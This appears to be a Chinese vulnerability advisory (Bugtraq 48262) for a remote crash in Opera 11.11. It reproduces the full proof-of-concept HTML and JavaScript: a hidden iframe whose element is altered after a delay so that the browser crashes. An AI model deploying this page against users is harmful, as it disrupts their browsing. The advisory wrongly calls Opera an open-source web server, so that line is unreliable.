Bugtraq ID: 48262
Opera Web Browser是一款开源的WEB服务器。
Opera Web Browser不正确处理特制HTML元素,远程攻击者构建恶意WEB页,诱使用户解析,可导致应用程序崩溃。
Opera Web Browser 11.11
厂商解决方案
目前没有详细解决方案提供:
http://www.opera.com/
<html>
<body>
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
<script type="text/javascript" language="javascript">
/*
*
* Opera 11.11 Remote Crash
* Software link: http://www.opera.com/download/
* Tested on: Win32 xp home sp 3
* CVE : null
*
* Im too lazy to deep analyze this ,but i thing is just unexploitable crash
* so f****jixvt
* ( dla klechis�awa i jego kosiarki :i )
*
*/
var a = window.document.getElementById('bo0om');
var b = a.contentDocument.createElement('font');
a.src='about:blank';
setTimeout('b.face = "h3h";',500);
</script>
</body>
</html>
暂无评论